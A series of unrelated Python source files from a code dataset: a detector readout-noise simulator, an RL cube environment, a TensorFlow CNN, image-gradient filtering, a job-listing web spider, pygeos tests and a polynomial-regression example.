+= PolynomialModel( 1 ) # add linear background\n ##gauss.setParameters( np.float([1,1,0.1,0,0]) ) # initial parameter guess\n ##print gauss.getNumberOfParameters() # 5 (= 3 for Gauss + 2 for line)\n ##gauss.keepFixed( int([2]), np.float([0.1])) \n\n # Add RTN. These should be cast into their own functions at some point.\n\n ru = np.random.uniform\n\n # RTN Type 1\n if RTN1:\n # in principle the first two parameters in make_random_trace function, \n # setting the number of elements and rate, should be set into the main PF \n # for more user control. Here the values are just examples, after some \n # playing around to get them in the RTN ball park. 
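(A hedged sketch: make_random_trace is assumed to return a two-level\n        # random-telegraph trace sRTN over times tRTN -- the first argument being the\n        # number of points, the second the switching rate k, and the third assumed\n        # to be a seed -- which np.interp below resamples onto the readout grid tread.)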
\n k=0.2\n sRTN, tRTN = make_random_trace(2000,k,0) \n \n sRTNterp = ru(200)*np.interp(tread,tRTN,sRTN)\n #onoff = np.round(ru( np.float(nreads) ))\n fon = ru(0.0)\n if (fon < 0.5):\n fon = 0.5 # At least 50%\n for RTN in range(0,nreads):\n # Generate a random number to decide if this readout is telegraphing\n # or not.\n on = ru(0.0)\n if (on <= fon):\n fdarkN[RTN] += sRTNterp[RTN]*np.mean(fdarkN)\n annRTN = \"Type 1; fon = \"+str(fon)[0:4]\n\n # RTN Type 2\n if RTN2:\n fon = ru(0.0) # frequency of readouts that should have RTN\n if (fon < 0.2): \n fon = 0.2 # At least 20%.\n level = 0.2*np.mean(fdarkN) # RTN maximum offset from nominal\n level = level*ru(0.0)\n for RTN in range(0,nreads):\n # Generate a random number to decide if this readout is telegraphing \n # or not.\n on = ru(0.0) \n if (on <= fon):\n fdarkN[RTN] += level\n annRTN = \"Type 2; level = \"+str(level)[0:5]+\" ADU; fon = \"+str(fon)[0:4]\n\n # RTN Type 3\n if RTN3:\n k=0.2\n sRTN, tRTN = make_random_trace(2000,k,0)\n\n sRTNterp = np.interp(tread,tRTN,sRTN)\n onoff = np.round(ru( np.float(nreads) ))\n fdarkN = fdarkN + sRTNterp*0.15*np.mean(fdarkN)*onoff\n annRTN = \"Type 3\"\n\n if not (RTN1 or RTN2 or RTN3):\n annRTN = \"NONE\"\n\n # Begin Slope Calculations, following the DPU S/W specification.\n # Set alpha = 0 to remove Poisson noise correlations.\n alpha = (1 - (nf**2))/(3.*nf*(nf+nd)) \n\n # beta = 2.*detGain*(sigmaRead**2)/(nf*(alpha+1)) # Kubik ChiSq description\n beta = 2.*(sigmaRead**2)/(nf*(alpha+1)) \n\n # Select the ng*nf frames which have not been dropped by the DPU\n s2 = np.float()\n t2 = np.float()\n for i in range(nreads):\n if i % int(nf+nd) in (range(nf)):\n s = fdarkN[i]\n t = tread[i]\n s2 = np.append(s2, s)\n t2 = np.append(t2, t) \n\n # Average each group\n fgrp = np.reshape(s2[1:],[ng,nf])\n tgrp = np.reshape(t2[1:],[ng,nf])\n\n fgrpavg = np.float()\n tgrpavg = np.float()\n\n for i in range(ng):\n fga = np.mean(fgrp[i,:])\n tga = np.mean(tgrp[i,:])\n fgrpavg = np.append(fgrpavg, fga)\n tgrpavg = np.append(tgrpavg, tga)\n\n fgrpavg = fgrpavg[1:]\n tgrpavg = tgrpavg[1:]\n\n # Sum the signal differences\n # First set which samples to fit, either fgrpavg for the groups, or fdarkN\n # for the full ramp.\n L = fgrpavg \n # Similarly select the apppropriate time grid, either tgrpavg for group \n # averages or tf for the full ramp. \n deltaT = tgrpavg[1]-tgrpavg[0] \n a = 1\n # Use ng to fit the group averages, nreads for the full ramp. \n b = ng\n\n def sumRange(L,a,b,printslopes): \n s = 0 \n for i in range(a,b): \n if printslopes:\n if i == a:\n print('Group slopes:')\n print(i, ' ', L[i] - L[i-1])\n s += pow((L[i] - L[i-1]) + beta,2) \n return s \n \n print('sum = ',sumRange(L,a,b,0)) \n\n # Slope terms\n #slopeDPU_1 = np.sqrt( 1 + 4 * (detGain**2)*( sumRange(L,a,b,1)/((ng - 1)*((1+alpha)**2)) ) ) # Kubik\n slopeDPU_1 = np.sqrt( 1 + 4 * ( sumRange(L,a,b,1)/((ng - 1)*((1+alpha)**2)) ) ) # DPU Manual\n #slopeDPU_0 = (1 + alpha) / (2.*detGain) # Kubik \n slopeDPU_0 = (1 + alpha) / 2. 
# DPU manual\n\n slopeDPU = slopeDPU_0 * (slopeDPU_1 - 1) - beta\n print('Slope DPU = ', slopeDPU)\n\n signalDPU = slopeDPU * (ng - 1) + offsetADU # Downlinked signal in ADU\n print('Signal DPU = ', signalDPU)\n\n # Quality Factor\n\n pseudoFlux = np.sqrt ( sumRange(L,a,b,0) / (ng - 1) ) - beta\n print('Pseudo flux ghat_x = ',pseudoFlux)\n\n QF = ( 2*detGain/(1+alpha) ) * ( (ng - 1)*pseudoFlux - (fgrpavg[ng-1] - fgrpavg[0]) )\n print('Quality Flag = ', QF) \n\n # Simple least squares fit to the full ramp for comparison\n coeff = poly.polyfit(tread[1:], fdarkN[1:], 1)\n ffit = poly.polyval(tread[1:], coeff)\n\n #coeff = np.polyfit(tread, fdarkN, 1)\n #print(coeff)\n #umodel = np.poly1d(coeff)\n \n chisqr = np.sum((poly.polyval(tread, coeff) - fdarkN) ** 2) / np.std(fdarkN)\n\n print(\"Slope Polyfit(1) = \", coeff[0],\" Chi-Squared = \", chisqr)\n\n # Plotting\n\n if plots:\n figstr = 'MACC('+str(ng)+','+str(nf)+','+str(nd)+')'\n plt.ion()\n fig, ax = plt.subplots(figsize=(8,5.5))\n\n ax.plot(tread, fdarkN, 'o',linestyle='',\n markersize=5,mfc='none',mec='black',\n label='Dropped Readouts')\n\n ax.set(xlabel='time (s)', ylabel='signal (ADU)',\n title=figstr)\n\n ax.tick_params(axis='both', which='both',length=2)\n\n ax.plot(t2[1:], s2[1:], 'o', linestyle='',\n markersize=5, mfc='blue',mec='none',\n label='Group Readouts')\n\n ax.plot(tgrpavg,fgrpavg, 'o', linestyle='',\n markersize=7,mfc='red',\n label='Group Averages')\n \n ax.plot(tread[1:], ffit, linestyle=':',color='g',\n label='LSQ')\n\n plt.axhline(y=signalDPU, color='r', linestyle='--')\n\n plt.legend(loc='lower right')\n\n ymin, ymax = ax.get_ylim()\n xmin, xmax = ax.get_xlim()\n delY = ymax-ymin\n delX = xmax-xmin\n\n annX = xmin + 0.05*delX\n\n annY1 = ymax - 0.2*delY\n sarray = 'fluence: '+np.str(fluence*detGain)+' e-/sec' + '\\n' + \\\n 'read noise: '+np.str(sigmaRead*detGain)+' e-' + '\\n' + \\\n 'a2: '+str(nonlin) + '\\n' + \\\n 'RTN: '+annRTN \n ax.annotate(sarray,(annX,annY1))\n\n annY2 = ymax - 0.3*delY\n sarray2 = r'$\\alpha$: ' + np.str(alpha)[0:4]+ r' $\\beta$: ' +np.str(beta)[0:4] + '\\n' + \\\n 'DPU Signal: '+np.str(signalDPU)[0:6]+' ADU; QF: '+np.str(QF)[0:4]\n ax.annotate(sarray2,(annX,annY2),color='r')\n\n plt.show()\n","sub_path":".ipynb_checkpoints/MACCsimulatorV2-checkpoint.py","file_name":"MACCsimulatorV2-checkpoint.py","file_ext":"py","file_size_in_byte":9560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"272297466","text":"import numpy as np\nimport gin\nimport gym\n\nfrom pddm.envs.cube import cube_env\n\n# rotate 20 deg about y axis (cos(a/2), sin(a/2), 0, 0) (up/down)\n# rotate 20 deg about z axis (cos(a/2), 0, 0, sin(a/2)) (left/right)\n\nGOAL_TASKS = {\n 'left': [0, 0, -1.5],\n 'right': [0, 0, 1.5],\n 'up': [1.5, 0, 0],\n 'down': [-1.5, 0, 0],\n\n 'half_up': [0.7, 0, 0],\n 'half_down': [-0.7, 0, 0],\n 'half_left': [0, 0, -0.7],\n 'half_right': [0, 0, 0.7],\n\n 'slight_up': [0.35, 0, 0],\n 'slight_down': [-0.35, 0, 0],\n 'slight_left': [0, 0, -0.35],\n 'slight_right': [0, 0, 0.35],\n}\n\n#####################################\n#####################################\n\n\nclass SafemrlCubeEnv(cube_env.CubeEnv):\n\n def __init__(self, same_goals=False, goal_task=('left', 'right', 'up', 'down'),\n max_steps=100):\n #####################################\n #####################################\n\n # CHOOSE one of these goal options here:\n # goal_options = [half_up, half_down, half_left, half_right, slight_right, slight_left, slight_down, slight_up, left, 
right, up, down]\n # goal_options = [half_up, half_down, half_left, half_right]\n # goal_options = [half_up, half_down, half_left, half_right, slight_right, slight_left, slight_down, slight_up]\n # goal_options = [left, right]\n # goal_options = [up, down]\n\n #####################################\n #####################################\n self._max_steps = max_steps\n self._same_goals = same_goals\n self._goal_options = [GOAL_TASKS[k] for k in goal_task]\n super(SafemrlCubeEnv, self).__init__()\n self._last_score = self.get_score(self.unwrapped.obs_dict)\n\n @property\n def last_score(self):\n return self._last_score\n\n def do_reset(self, reset_pose, reset_vel, reset_goal=None):\n obs = super(SafemrlCubeEnv, self).do_reset(reset_pose, reset_vel, reset_goal)\n self._last_score = self.get_score(self.unwrapped.obs_dict)\n return obs\n\n def step(self, a):\n # removes everything but score from output info\n a = np.array(a).squeeze()\n o, r, d, i = super(SafemrlCubeEnv, self).step(a)\n self._last_score = i['score']\n i = {'score': i['score']}\n return o, r, d, i\n\n def create_goal_trajectory(self):\n\n len_of_goals = self._max_steps\n\n # A single rollout consists of alternating between 2 (same or diff) goals:\n if self._same_goals:\n goal_selected1 = np.random.randint(len(self._goal_options))\n goal_selected2 = goal_selected1\n else:\n goal_selected1 = np.random.randint(len(self._goal_options))\n goal_selected2 = np.random.randint(len(self._goal_options))\n goals = [self._goal_options[goal_selected1], self._goal_options[goal_selected2]]\n\n # Create list of these goals\n time_per_goal = 35\n step_num = 0\n curr_goal_num = 0\n goal_traj = []\n while step_num < len_of_goals:\n goal_traj.append(np.tile(goals[curr_goal_num], (time_per_goal, 1)))\n if curr_goal_num == 0:\n curr_goal_num = 1\n else:\n curr_goal_num = 0\n step_num += time_per_goal\n\n goal_traj = np.concatenate(goal_traj)\n return goal_traj\n\n\n@gin.configurable\nclass CubeTaskAgnWrapper(gym.Wrapper):\n def __init__(self, env):\n super(CubeTaskAgnWrapper, self).__init__(env)\n self.observation_space = gym.spaces.Dict({\n 'observation': self.observation_space,\n 'task_agn_rew': gym.spaces.Box(np.array(0), np.array(1))\n })\n\n def step(self, action):\n o, r, d, i = super(CubeTaskAgnWrapper, self).step(action)\n o_dict = {'observation': o, 'task_agn_rew': 0.}\n if d and self.env.reward_dict.get('drop_penalty', 0) != 0:\n o_dict['task_agn_rew'] = 1.\n return o_dict, r, d, i\n\n def reset(self, **kwargs):\n o = super(CubeTaskAgnWrapper, self).reset(**kwargs)\n return {'observation': o, 'task_agn_rew': 0.}\n","sub_path":"safemrl/envs/cube_env.py","file_name":"cube_env.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"556057329","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\n\nimport tensorflow as tf\nimport config\n\n\nIMAGE_SIZE = config.patch_size\nNUM_CLASSES = config.num_classes\nCHANNELS = config.channels\nIMAGE_PIXELS = IMAGE_SIZE * IMAGE_SIZE * CHANNELS\n\n\n\nKERNEL_NUM = config.contextual_kernel_num\nWEIGHT_DECAY = 0.00001\nKEEP_PROB = 0.5 # factor of dropout\n\n\n\nglobal IS_TRAINING\n\n\ndef inference(images, is_training):\n \"\"\"Build the model up to where it may be used for inference.\n Args:\n images: Images placeholder.\n is_training: True or False.\n\n Returns:\n logits: Output tensor with the computed logits.\n \"\"\" \n \n global 
IS_TRAINING\n IS_TRAINING = is_training\n\n \n images = tf.reshape(images, [-1, IMAGE_SIZE, IMAGE_SIZE, CHANNELS])\n \n logits = network(images)\n \n return logits\n\n\ndef network(_input):\n output = multi_scale(_input)\n output = add_res_blocks(output)\n output = last_three_conv(output)\n output = softmax(output)\n print (output)\n return output\n \ndef multi_scale(_input):\n _input = tf.pad(_input, paddings=[[0,0],[2,2],[2,2],[0,0]])\n with tf.variable_scope('multi_conv1'):\n output1 = conv2d(_input, KERNEL_NUM, 5, weight_stddev=0.1, biases_init=1.0)\n with tf.variable_scope('multi_conv2'):\n output2 = conv2d(_input, KERNEL_NUM, 3, weight_stddev=0.1, biases_init=1.0)\n output2 = max_pooling(output2, ksize=[1, 3, 3, 1])\n with tf.variable_scope('multi_conv3'):\n output3 = conv2d(_input, KERNEL_NUM, 1, weight_stddev=0.1, biases_init=1.0)\n output3 = max_pooling(output3, ksize=[1, 5, 5, 1])\n output = tf.concat(axis=3, values=(output1, output2, output3))\n output = tf.nn.relu(output)\n output = local_response_norm(output)\n print (output)\n return output\n \n \ndef add_res_blocks(_input):\n with tf.variable_scope('res_conv1') as scope:\n output = conv2d(_input, KERNEL_NUM, 1, weight_stddev=0.1, biases_init=1.0)\n output = tf.nn.relu(output)\n output = local_response_norm(output)\n \n with tf.variable_scope('res_block1') as scope:\n output = add_one_block(output)\n with tf.variable_scope('res_block2') as scope:\n output = add_one_block(output)\n return output\n \n \ndef add_one_block(_input):\n \"\"\"Add one residual block.\n There are two layers in one block.\n \"\"\"\n # layer 1\n with tf.variable_scope('conv_1') as scope:\n output = conv2d(_input, KERNEL_NUM, 1, weight_stddev=0.05, biases_init=1.0)\n output = tf.nn.relu(output)\n print (output)\n \n # layer 2\n with tf.variable_scope('conv_2') as scope:\n output = conv2d(output, KERNEL_NUM, 1, weight_stddev=0.05, biases_init=1.0)\n output = output + _input\n output = tf.nn.relu(output)\n print (output)\n return output\n \ndef last_three_conv(_input):\n with tf.variable_scope('conv_1') as scope:\n output = conv2d(_input, KERNEL_NUM, 1, weight_stddev=0.05, biases_init=1.0)\n output = tf.nn.relu(output)\n output = dropout(output)\n\n with tf.variable_scope('conv_2') as scope:\n output = conv2d(output, KERNEL_NUM, 1, weight_stddev=0.05, biases_init=1.0)\n output = tf.nn.relu(output)\n output = dropout(output)\n\n with tf.variable_scope('conv_3') as scope:\n output = conv2d(output, KERNEL_NUM, 1, weight_stddev=0.1, biases_init=0.0)\n print (output)\n return output\n\n\ndef softmax(_input):\n features_total = int(_input.get_shape()[1]) * int(_input.get_shape()[2]) * int(_input.get_shape()[3])\n output = tf.reshape(_input, [-1, features_total])\n with tf.variable_scope('softmax') as scope:\n weights = weight_variable_normal(\n [features_total, NUM_CLASSES],\n name='weights', stddev=0.01)\n weight_decay = tf.multiply(tf.nn.l2_loss(weights), WEIGHT_DECAY, name='weight_loss')\n tf.add_to_collection('losses', weight_decay)\n \n biases = tf.Variable(tf.zeros([NUM_CLASSES]),\n name='biases')\n output = tf.matmul(output, weights) + biases\n return output\n\ndef conv2d(_input, out_features, kernel_size,\n strides=[1, 1, 1, 1], padding='VALID', weight_stddev=0.01, biases_init=1.0):\n in_features = int(_input.get_shape()[-1])\n kernel = weight_variable_normal(\n [kernel_size, kernel_size, in_features, out_features],\n name='kernel', stddev=weight_stddev)\n \n weight_decay = tf.multiply(tf.nn.l2_loss(kernel), WEIGHT_DECAY, name='weight_loss')\n 
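    # The L2 penalty is only *collected* into the 'losses' graph collection
    # here (as in softmax() above); loss() in this file returns the bare
    # cross-entropy, so the decay terms shape the objective only if combined
    # with it later, e.g. (a hedged sketch, not present in this file):
    # total_loss = cross_entropy + tf.add_n(tf.get_collection('losses'))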
tf.add_to_collection('losses', weight_decay)\n \n biases = tf.get_variable('biases', shape=[out_features], \n initializer=tf.constant_initializer(biases_init))\n output = tf.nn.conv2d(_input, kernel, strides, padding) + biases\n return output\n\n\ndef weight_variable_normal(shape, name, stddev):\n return tf.get_variable(\n name=name,\n shape=shape,\n initializer=tf.truncated_normal_initializer(mean=0.0, stddev=stddev))\n\n\ndef max_pooling(_input, ksize, strides=[1, 1, 1, 1], padding='VALID'):\n return tf.nn.max_pool(_input, ksize=ksize, strides=strides, \n padding=padding, name='max_pool')\n \n \ndef local_response_norm(_input):\n return tf.nn.lrn(_input, depth_radius=4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='lrn')\n \n\n\n\ndef dropout(_input):\n if KEEP_PROB < 1:\n output = tf.cond(\n IS_TRAINING,\n lambda: tf.nn.dropout(_input, KEEP_PROB),\n lambda: _input\n )\n else:\n output = _input\n return output\n\n\n\n# Define the loss function\ndef loss(logits, labels):\n \"\"\"Calculates the loss from the logits and the labels.\n Args:\n logits: Logits tensor, float - [batch_size, NUM_CLASSES].\n labels: Labels tensor, int32 - [batch_size].\n Returns:\n loss: Loss tensor of type float.\n \"\"\"\n labels = tf.to_int64(labels)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits=logits, labels=labels, name='xentropy')\n loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')\n\n return loss\n\n\n# Define the Training OP\ndef training(loss, learning_rate):\n \"\"\"Sets up the training Ops.\n Creates an optimizer and applies the gradients to all trainable variables.\n The Op returned by this function is what must be passed to the\n `sess.run()` call to cause the model to train.\n Args:\n loss: Loss tensor, from loss().\n learning_rate: The learning rate to use for gradient descent.\n Returns:\n train_op: The Op for training.\n \"\"\"\n # Create the gradient descent optimizer with the given learning rate.\n optimizer = tf.train.RMSPropOptimizer(learning_rate, \n decay=0.9, momentum=0.0, epsilon=1e-10, \n use_locking=False, name='RMSProp')\n # Create a variable to track the global step.\n global_step = tf.Variable(0, name='global_step', trainable=False)\n # Use the optimizer to apply the gradients that minimize the loss\n # (and also increment the global step counter) as a single training step.\n train_op = optimizer.minimize(loss, global_step=global_step)\n return train_op\n\n\n# Return the Predicting result\ndef predicting(logits):\n \"\"\"Return the predicting result of logits.\n Args:\n logits: Logits tensor, float - [batch_size, NUM_CLASSES].\n Returns:\n prediction: Prediction tensor, int32 - [batch_size], with values in the\n range [0, NUM_CLASSES).\n \"\"\"\n softmax = tf.nn.softmax(logits)\n prediction = tf.argmax(softmax, axis=1)\n return prediction\n","sub_path":"SSDC_code/contextualcnn.py","file_name":"contextualcnn.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"513853601","text":"# import cv2\r\n#\r\n# import numpy as np\r\n#\r\n#\r\n# # Gaussian filter\r\n#\r\n# def gaussian_filter(img, K_size=3, sigma=1.3):\r\n# if len(img.shape) == 3:\r\n#\r\n# H, W, C = img.shape\r\n#\r\n# else:\r\n#\r\n# img = np.expand_dims(img, axis=-1)\r\n#\r\n# H, W, C = img.shape\r\n#\r\n# ## Zero padding\r\n#\r\n# pad = K_size // 2\r\n#\r\n# out = np.zeros((H + pad * 2, W + pad * 2, C), dtype=np.float)\r\n#\r\n# out[pad: pad + H, pad: pad + W] = 
img.copy().astype(np.float)\r\n#\r\n# ## prepare Kernel\r\n#\r\n# K = np.zeros((K_size, K_size), dtype=np.float)\r\n#\r\n# for x in range(-pad, -pad + K_size):\r\n#\r\n# for y in range(-pad, -pad + K_size):\r\n# K[y + pad, x + pad] = np.exp(-(x ** 2 + y ** 2) / (2 * (sigma ** 2)))\r\n#\r\n# K /= (2 * np.pi * sigma * sigma)\r\n#\r\n# K /= K.sum()\r\n#\r\n# tmp = out.copy()\r\n#\r\n# # filtering\r\n#\r\n# for y in range(H):\r\n#\r\n# for x in range(W):\r\n#\r\n# for c in range(C):\r\n# out[pad + y, pad + x, c] = np.sum(K * tmp[y: y + K_size, x: x + K_size, c])\r\n#\r\n# out = np.clip(out, 0, 255)\r\n#\r\n# out = out[pad: pad + H, pad: pad + W].astype(np.uint8)\r\n#\r\n# return out\r\n#\r\n#\r\n# # Read image\r\n#\r\n# img = cv2.imread(\"2.jpg\")\r\n#\r\n# # Gaussian Filter\r\n#\r\n# out = gaussian_filter(img, K_size=10, sigma=10)\r\n# # Save result\r\n#\r\n# cv2.imwrite(\"out.jpg\", out)\r\n#\r\n# cv2.imshow(\"result\", out)\r\n#\r\n# cv2.waitKey(0)\r\n#\r\n# cv2.destroyAllWindows()\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nimg = cv2.imread('2.jpg')\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n# Apply gradient filtering\r\nsobel_x = cv2.Sobel(img, cv2.CV_64F, dx = 1, dy = 0, ksize = 5)\r\nsobel_y = cv2.Sobel(img, cv2.CV_64F, dx = 0, dy = 1, ksize = 5)\r\nblended = cv2.addWeighted(src1=sobel_x, alpha=0.5, src2=sobel_y,\r\n beta=0.5, gamma=0)\r\nlaplacian = cv2.Laplacian(img, cv2.CV_64F)\r\n# Plot the images\r\nimages = [sobel_x, sobel_y, blended, laplacian]\r\nnames = ['sobel_x', 'sobel_y', 'blended', 'laplacian']\r\nplt.figure(figsize = (14, 10))\r\nfor i in range(4):\r\n plt.subplot(2, 2, i+1)\r\n plt.imshow(images[i], cmap = 'gray')\r\n plt.title(names[i],fontsize=20,color='white')\r\n plt.axis('off')\r\nplt.show()\r\n\r\n","sub_path":"FFT/low.py","file_name":"low.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"568920707","text":"# -*- coding: utf-8 -*-\n\"\"\"\nZhaopin_Special spider created on the top of ATSSpider\n\nscrapy crawl zhaopin_special -a mining_job_id=9999 -a extract=1 -a iteration=1 -a url=\"http://special.zhaopin.com/bf/2014/abbx102285/\"\n\nSeed URL:\n http://special.zhaopin.com/bf/2014/abbx102285/\n http://special.zhaopin.com/pagepublish/13891071/\n http://special.zhaopin.com/pagepublish/14235114/\n http://special.zhaopin.com/pagepublish/34450211/index.html\n\nSample Job URL:\n http://jobs.zhaopin.com/190176813252277.htm?ssidkey=y&ff=02&ss=101\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urlparse\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, Prefix\n\npattern = {\n 'ref_number': compile(r'(\\d+)\\.htm'),\n 'response_page': compile(r'var\\s*arrJobList\\s*=\\s*\\n([^$]*)\\nvar\\s*HotJobs'),\n 'jobs_link': compile(r'\\\"(http:\\/\\/jobs\\.zhaopin\\.com([^\"]*))'),\n}\n\n\nclass Zhaopin_Special(ATSSpider):\n\n name = 'zhaopin_special'\n\n def parse(self, response):\n \"\"\"\n Parse SERP page and call GET method to each job urls\n \"\"\"\n sel = Selector(response)\n if not urlparse(response.url).path.startswith('/pagepublish/'):\n # Parse list of companies with jobs list.\n # loop over to each company and extract the jobs list\n # Once again loop over to jobs list and call GET method\n # to each job urls.\n for tr in sel.xpath(\n 
'//td/table[@class=\"joblist\"]/tr[@class=\"deptitem\"]'\n ):\n for jobitem in tr.xpath(\n './following::tr[1]/td/table[@class=\"joblist\"]/tr[@class=\"jobitem\"]/td/a/@href'\n ).extract():\n if jobitem:\n yield Request(\n callback=self.parse_job_callback(),\n url=jobitem\n )\n else:\n # Some pages having jobs list in javascript section.\n # match the pattern with response and extract matched string\n # Finding all jobs link from raw_response.\n # call GET method to each job urls\n match = pattern['response_page'].search(response.body)\n if match:\n raw_response = match.group(1)\n jobs_link = pattern['jobs_link'].findall(raw_response)\n if jobs_link:\n for job_url in jobs_link:\n yield Request(\n callback=self.parse_job_callback(),\n url=job_url[0]\n )\n else:\n jobs = sel.xpath('//span[@id=\"joblist\"]//tr/td[@class=\"jobclass\"]//a/@href').extract()\n for job in jobs:\n yield Request(\n callback=self.parse_job_callback(),\n url=job\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n expired_job = sel.xpath('//div[@class=\"expired-img\"]').extract()\n if not expired_job:\n location_xpaths = [\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong//text()' % unicode('工作地点:', 'utf-8'),\n '//div[@class=\"company-box\"]/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong/text()' % unicode('公司地址:', 'utf-8'),\n '//span[@id=\"positionCityCon\"]//text()',\n ]\n\n loader = BrightcorpItemLoader(selector=sel)\n loader.add_xpath(\n 'title',\n [\n '//div/div[@class=\"inner-left fl\"]/h1/text()',\n '//table[@class=\"terminalpage-table\"]//h1/text()',\n ]\n )\n loader.add_xpath(\n 'date',\n '//ul/li/strong/span[@id=\"span4freshdate\"]/text()',\n ConvertDateString('%Y-%m-%d')\n )\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-' % self.name),\n re=pattern['ref_number']\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'company',\n '//div/div[@class=\"inner-left fl\"]/h2/a/text() |'\n '//div[@class=\"company-box\"]/p[@class=\"company-name-t\"]/a/text()|'\n '//table[@class=\"terminalpage-table\"]//td/h2//text()'\n )\n loader.add_xpath('location', location_xpaths)\n loader.add_xpath(\n 'description',\n '//div[contains(@class, \"terminalpage-main\")]/div[@class=\"tab-cont-box\"]/div[1]/*[not(self::h1 or self::h2 or self::p/button or self::p/a)] |'\n '//div[contains(@class, \"terminalpage-main\")]/div[@class=\"tab-cont-box\"]/div[1]/*[self::p[1] or self::div[1]][not(self::p/button)] |'\n '//div[contains(@class, \"terminalpage-main\")]/div[@class=\"tab-cont-box\"]/div[1]/text()|'\n '//div[@class=\"terminalpage-content\"]'\n )\n loader.add_xpath(\n 'jobtype',\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong/text()' % unicode('工作性质:', 'utf-8')\n )\n loader.add_xpath(\n 'jobcategory',\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong//text()' % unicode('职位类别:', 'utf-8')\n )\n loader.add_xpath(\n 'industry',\n '//div[@class=\"company-box\"]/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong//text()' % unicode('公司行业:', 'utf-8')\n )\n loader.add_xpath(\n 'baseSalary',\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong/text()' % unicode('职位月薪:', 'utf-8')\n )\n loader.add_xpath(\n 'experiencerequirements',\n '//div[contains(@class, 
\"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong/text()' % unicode('工作经验:', 'utf-8')\n )\n loader.add_xpath(\n 'qualifications',\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong/text()' % unicode('最低学历:', 'utf-8')\n )\n loader.add_value('apply_url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/zhaopin_special.py","file_name":"zhaopin_special.py","file_ext":"py","file_size_in_byte":6863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"379382187","text":"import pygeos\nimport pytest\nimport numpy as np\n\nfrom .common import point_polygon_testdata\nfrom .common import point, polygon\n\n\ndef test_area():\n assert pygeos.area(polygon) == 4.0\n\n\ndef test_area_nan():\n actual = pygeos.area(np.array([polygon, np.nan, None]))\n assert actual[0] == pygeos.area(polygon)\n assert np.isnan(actual[1])\n assert np.isnan(actual[2])\n\n\ndef test_distance():\n actual = pygeos.distance(*point_polygon_testdata)\n expected = [2 * 2 ** 0.5, 2 ** 0.5, 0, 0, 0, 2 ** 0.5]\n np.testing.assert_allclose(actual, expected)\n\n\ndef test_distance_nan():\n actual = pygeos.distance(\n np.array([point, np.nan, np.nan, point, None, None, point]),\n np.array([np.nan, point, np.nan, None, point, None, point]),\n )\n assert actual[-1] == 0.0\n assert np.isnan(actual[:-1].astype(np.float)).all()\n\n\ndef test_haussdorf_distance():\n # example from GEOS docs\n a = pygeos.linestrings([[0, 0], [100, 0], [10, 100], [10, 100]])\n b = pygeos.linestrings([[0, 100], [0, 10], [80, 10]])\n actual = pygeos.hausdorff_distance(a, b)\n assert actual == pytest.approx(22.360679775, abs=1e-7)\n\n\ndef test_haussdorf_distance_densify():\n # example from GEOS docs\n a = pygeos.linestrings([[0, 0], [100, 0], [10, 100], [10, 100]])\n b = pygeos.linestrings([[0, 100], [0, 10], [80, 10]])\n actual = pygeos.hausdorff_distance(a, b, densify=0.001)\n assert actual == pytest.approx(47.8, abs=0.1)\n","sub_path":"pygeos/test/test_measurement.py","file_name":"test_measurement.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"596290294","text":"'''\nExample 02: Exploring Undersampling - how assumptions can be wrong about a\nmodel if the sampling is insufficient\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport polyreg\n\nplt.close()\n\n# Generate some data with noise\nN = 5\nsize = (N,1)\n\n# Generate an example of the actual function\nxe = np.array([0,1,2,3])[np.newaxis].T\nye = np.array([0,2,4,6])[np.newaxis].T\n \nx = np.array([0,0.5,1,1.5,2,2.5,3,4])[np.newaxis].T\ny = np.array([0,5,2,0,4,0,6,0.53])[np.newaxis].T\n\nplt.figure(num=1, figsize=(4, 4), dpi=150)\nax = plt.plot(xe,ye,\n color=0.9*np.array([1,1,1]),\n linewidth=3,\n linestyle='none',\n marker='o',\n markeredgecolor='k',\n label='Observations')\nplt.axis([0,5,-5,10])\nplt.xlabel('x')\nplt.ylabel('f(x)')\nplt.gca().grid('on')\nplt.tight_layout()\n \n# Plot the function and the data\nplt.figure(num=2, figsize=(4, 4), dpi=150)\n\n# Fit progressively more complex polynomial models\norder_to_estimate = 9\nnModels = 1\n\ncolors = np.array([0, 216, 93])/255\n\n# Initialize the polynomial\npoly_estimator = 